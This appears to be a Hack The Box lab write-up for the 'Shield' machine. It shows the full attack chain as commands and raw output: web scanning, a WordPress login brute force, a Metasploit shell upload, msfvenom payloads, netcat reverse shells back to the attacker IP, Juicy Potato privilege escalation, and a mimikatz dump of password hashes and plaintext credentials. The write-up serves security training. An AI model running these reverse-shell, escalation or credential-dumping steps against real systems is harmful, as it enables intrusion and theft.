Shield
HTB - Shield
- 1.
nmap -T4 -A -p- 10.10.10.29
[email protected]:~$ nmap -T4 -A -p- 10.10.10.29Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDTNmap scan report for 10.10.10.29Host is up (0.47s latency).Not shown: 65533 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/10.0|_http-title: IIS Windows Server3306/tcp open mysql MySQL (unauthorized)Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds - 2.Nessus scan for fun Start with
sudo /etc/init.d/nessusd start
and go tohttps://kali:8834
- 3.Enumerate HTTP
- Ran
sudo nikto -h http://10.10.10.29
[email protected]:~$ sudo nikto -h http://10.10.10.29[sudo] password for kali:- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 10.10.10.29+ Target Hostname: 10.10.10.29+ Target Port: 80+ Start Time: 2020-05-04 17:16:16 (GMT-4)---------------------------------------------------------------------------+ Server: Microsoft-IIS/10.0+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host+ End Time: 2020-05-04 18:12:15 (GMT-4) (3359 seconds)---------------------------------------------------------------------------+ 1 host(s) tested[email protected]:~$ sudo nikto -h http://10.10.10.29/wordpress[sudo] password for kali:- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 10.10.10.29+ Target Hostname: 10.10.10.29+ Target Port: 80+ Start Time: 2020-05-04 18:41:32 (GMT-4)---------------------------------------------------------------------------+ Server: No banner retrieved+ Retrieved x-powered-by header: PHP/7.1.29+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,)+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ Uncommon header 'x-redirect-by' found, with contents: WordPress+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST+ ERROR: Error limit (20) reached for host, giving up. Last error:+ Scan terminated: 3 error(s) and 8 item(s) reported on remote host+ End Time: 2020-05-04 19:11:11 (GMT-4) (1779 seconds)---------------------------------------------------------------------------+ 1 host(s) tested - Visit
http://10.10.10.29
- Subdirectory brute force with gobuster:
gobuster dir -u http://10.10.10.29/ -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
(other possible wordlist:/usr/share/wordlists/dirb/common.txt
)===============================================================Gobuster v3.0.1by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)===============================================================[+] Url: http://10.10.10.29/[+] Threads: 200[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt[+] Status codes: 200,204,301,302,307,401,403[+] User Agent: gobuster/3.0.1[+] Timeout: 10s===============================================================2020/05/04 17:27:45 Starting gobuster===============================================================/wordpress (Status: 301)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body)[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers)[ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers)/WordPress (Status: 301)[ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers)/Wordpress (Status: 301)===============================================================2020/05/04 17:34:53 Finished=============================================================== - Wordpress install found at
/wordpress/
- Run
wpscan
:wpscan --updatewpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3gOutput:_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.1Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29][+] Started: Mon May 4 17:38:24 2020Interesting Finding(s):[+] Headers| Interesting Entries:| - Server: Microsoft-IIS/10.0| - X-Powered-By: PHP/7.1.29| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:| - http://codex.wordpress.org/XML-RPC_Pingback_API| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] http://10.10.10.29/wordpress/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:| - https://www.iplocation.net/defend-wordpress-from-ddos| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).| Found By: Rss Generator (Passive Detection)| - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>| - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>|| [!] 18 vulnerabilities identified:|| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation| Fixed in: 5.2.3| References:| - https://wpvulndb.com/vulnerabilities/9867| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68| - https://hackerone.com/reports/339483|| [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews| Fixed in: 5.2.3| References:| - https://wpvulndb.com/vulnerabilities/9864| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/| - https://fortiguard.com/zeroday/FG-VD-18-165| - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html|| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9908| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html|| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9909| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/|| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9910| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html|| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9911| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html|| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9912| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html|| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation| Fixed in: 5.2.4| References:| - https://wpvulndb.com/vulnerabilities/9913| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html|| [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API| Fixed in: 5.2.5| References:| - https://wpvulndb.com/vulnerabilities/9973| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw|| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links| Fixed in: 5.2.5| References:| - https://wpvulndb.com/vulnerabilities/9975| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/| - https://hackerone.com/reports/509930| - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7|| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content| Fixed in: 5.2.5| References:| - https://wpvulndb.com/vulnerabilities/9976| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v|| [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass| Fixed in: 5.2.5| References:| - https://wpvulndb.com/vulnerabilities/10004| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/| - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53|| [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10201| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47634/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw|| [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10202| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47635/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w|| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10203| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47633/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c|| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10204| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47636/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh|| [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10205| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47637/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c|| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads| Fixed in: 5.2.6| References:| - https://wpvulndb.com/vulnerabilities/10206| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026| - https://wordpress.org/news/2020/04/wordpress-5-4-1/| - https://core.trac.wordpress.org/changeset/47638/| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2[i] The main theme could not be detected.[+] Enumerating All Plugins (via Passive Methods)[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] mesmerize-companion| Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/| Latest Version: 1.6.111| Last Updated: 2020-04-10T15:01:00.000Z|| Found By: Urls In Homepage (Passive Detection)|| The version could not be determined.[+] Enumerating Config Backups (via Passive and Aggressive Methods)Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04[i] No Config Backups Found.[+] WPVulnDB API OK| Plan: free| Requests Done (during the scan): 2| Requests Remaining: 48[+] Finished: Mon May 4 17:38:40 2020[+] Requests Done: 27[+] Cached Requests: 36[+] Data Sent: 6.36 KB[+] Data Received: 18.56 KB[+] Memory used: 175.391 MB[+] Elapsed time: 00:00:15 - Enumerate Users:
wpscan --url 10.10.10.29/wordpress/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30[i] User(s) Identified:[+] admin| Found By: Rss Generator (Passive Detection)| Confirmed By:| Wp Json Api (Aggressive Detection)| - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection) - Bruteforce login:
wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
- Login found to be
admin:[email protected]!
from last box. Go tohttp://10.10.10.29/wordpress/wp-login.php
and login. - Searching for
metasploit wordpress
yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
- 4.Exploitsudo msfconsolemsf > use exploit/unix/webapp/wp_admin_shell_uploadmsf > set PASSWORD [email protected]!msf > set USERNAME adminmsf > set TARGETURI /wordpressmsf > set RHOSTS 10.10.10.29msf > set LPORT 443msf > set payload php/meterpreter_reverse_tcpmsf > exploit
- Upgrade to more stable shell:wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zipuntar netcat-win32-1.12.zipmsf > cd C:/inetpub/wwwroot/wordpress/wp-content/uploadssudo python3 -m http.server 80msf > shell> iwr -outf nc.exe http://10.10.14.173/nc.exenc -lvp 1234msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"
- 2nd way to upgrade (much better):
- 1.Change paylaod to download and executeset payload php/download_execmsf > set url http://10.10.14.173/shell.exe
- 2.Create exploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
- 3.Run server:
sudo python3 -m http.server 80
- 4.Open up port to listen on:use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpoptionsset LHOST 10.10.15.117set LPORT 443run
Sysinfo:sysinfoComputer : SHIELDOS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586Meterpreter : php/windows - 5.
- Find exploit:
- Method 1: Priv esc suggestersearch suggesteruse 0optionsset session 1runResult:0.29 - Collecting local exploits for x86/windows...[*] 10.10.10.29 - 30 exploit checks are being tried...[+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.[*] Post module execution completedResult: I tried
ms16_032_secondary_logon_handle_privesc
withx64
meterpreter after changing tox64
shell from32 bit
but did not work. - Method 2: Search for
windows server 2016 privilege escalation exploit
yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to ohpe/juicy-potato - sudo python3 -m http.server 80msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"Output:Title : User Mode to Ring (KiTrap0D)MSBulletin : MS10-015CVEID : 2010-0232Link : https://www.exploit-db.com/exploits/11199/VulnStatus : Not supported on 64-bit systemsTitle : Task Scheduler .XMLMSBulletin : MS10-092CVEID : 2010-3338, 2010-3888Link : https://www.exploit-db.com/exploits/19930/VulnStatus : Not VulnerableTitle : NTUserMessageCall Win32k Kernel Pool OverflowMSBulletin : MS13-053CVEID : 2013-1300Link : https://www.exploit-db.com/exploits/33213/VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenuEx Win32k NULL PageMSBulletin : MS13-081CVEID : 2013-3881Link : https://www.exploit-db.com/exploits/31576/VulnStatus : Not supported on 64-bit systemsTitle : TrackPopupMenu Win32k Null Pointer DereferenceMSBulletin : MS14-058CVEID : 2014-4113Link : https://www.exploit-db.com/exploits/35101/VulnStatus : Not VulnerableTitle : ClientCopyImage Win32kMSBulletin : MS15-051CVEID : 2015-1701, 2015-2433Link : https://www.exploit-db.com/exploits/37367/VulnStatus : Not VulnerableTitle : Font Driver Buffer OverflowMSBulletin : MS15-078CVEID : 2015-2426, 2015-2433Link : https://www.exploit-db.com/exploits/38222/VulnStatus : Not VulnerableTitle : 'mrxdav.sys' WebDAVMSBulletin : MS16-016CVEID : 2016-0051Link : https://www.exploit-db.com/exploits/40085/VulnStatus : Not supported on 64-bit systemsTitle : Secondary Logon HandleMSBulletin : MS16-032CVEID : 2016-0099Link : https://www.exploit-db.com/exploits/39719/VulnStatus : Not VulnerableTitle : Windows Kernel-Mode Drivers EoPMSBulletin : MS16-034CVEID : 2016-0093/94/95/96Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?VulnStatus : Not VulnerableTitle : Win32k Elevation of PrivilegeMSBulletin : MS16-135CVEID : 2016-7255Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135VulnStatus : Not VulnerableTitle : Nessus Agent 6.6.2 - 6.10.3MSBulletin : N/ACVEID : 2017-7199Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.htmlVulnStatus : Not VulnerableResult: Not vulnerablewget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exesudo python3 -m http.server 80msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exemsf shell > ex.exe --audit -a -o report -vwget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1sudo python3 -m http.server 80msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"
- "Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the
SeAssignPrimaryToken
orSeImpersonate
privilege in a MiTM attack." - CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
- Manual Escalationwget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exesudo python3 -m http.server 80msf > shellmsf > powershellmsf > iwr -outf js.exe http://10.10.14.173/JuicyPotato.exeecho START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.batjs.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
- Automatic Escalationmsf > backgroundmsf > search ms16_075msf > use exploit/windows/local/ms16_075_reflection_juicymsf > set payload windows/meterpreter/reverse_tcpmsf > set session 1msf > set lhost 10.10.14.173msf > set dcom_port 1337msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}msf > set lport 8464msf > runResult:
Server username: NT AUTHORITY\SYSTEM
cd C:\Users\Administrator\Desktopcat root.txtRoot Flag:6e9a9fdc6f64e410a68b847bb4b404fa
- 6.Post Exploitation
- Convert to x64 shell:use post/windows/manage/archmigrateset session 2set IGNORE_SYSTEM true
- Get passwordsload kiwimeterpreter > kiwi_cmd sekurlsa::logonpasswordsOutput:Authentication Id : 0 ; 298603 (00000000:00048e6b)Session : Interactive from 1User Name : sandraDomain : MEGACORPLogon Server : PATHFINDERLogon Time : 5/4/2020 10:20:27 PMSID : S-1-5-21-1035856440-4137329016-3276773158-1105msv :[00000003] Primary* Username : sandra* Domain : MEGACORP* NTLM : 29ab86c5c4d2aab957763e5c1720486d* SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38* DPAPI : f4c73b3f07c4f309ebf086644254bcbctspkg :wdigest :* Username : sandra* Domain : MEGACORP* Password : (null)kerberos :* Username : sandra* Domain : MEGACORP.LOCAL* Password : Password1234!ssp :credman :Authentication Id : 0 ; 183955 (00000000:0002ce93)Session : Service from 0User Name : DefaultAppPoolDomain : IIS APPPOOLLogon Server : (null)Logon Time : 5/4/2020 10:19:24 PMSID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg :wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : SHIELD$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Authentication Id : 0 ; 183792 (00000000:0002cdf0)Session : Service from 0User Name : wordpressDomain : IIS APPPOOLLogon Server : (null)Logon Time : 5/4/2020 10:19:24 PMSID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg :wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : SHIELD$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : SHIELD$Domain : MEGACORPLogon Server : (null)Logon Time : 5/4/2020 10:19:01 PMSID : S-1-5-20msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg :wdigest :* Username : SHIELD$* Domain : MEGACORP* Password : (null)kerberos :* Username : shield$* Domain : MEGACORP.LOCAL* Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:[email protected]+qJt_l887Ew&m_ewr??#VE&ssp :credman :Authentication Id : 0 ; 995 (00000000:000003e3)Session : Service from 0User Name : IUSRDomain : NT AUTHORITYLogon Server : (null)Logon Time : 5/4/2020 10:19:08 PMSID : S-1-5-17msv :tspkg :wdigest :* Username : (null)* Domain : (null)* Password : (null)kerberos :* Username : IUSR* Domain : NT AUTHORITY* Password : (null)ssp :credman :Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 5/4/2020 10:19:02 PMSID : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain : (null)* Password : (null)kerberos :* Username : (null)* Domain : (null)* Password : (null)ssp :credman :Authentication Id : 0 ; 65711 (00000000:000100af)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 5/4/2020 10:19:01 PMSID : S-1-5-90-0-1msv :[00000003] Primary* Username : SHIELD$* Domain : MEGACORP* NTLM : 9d4feee71a4f411bf92a86b523d64437* SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82datspkg 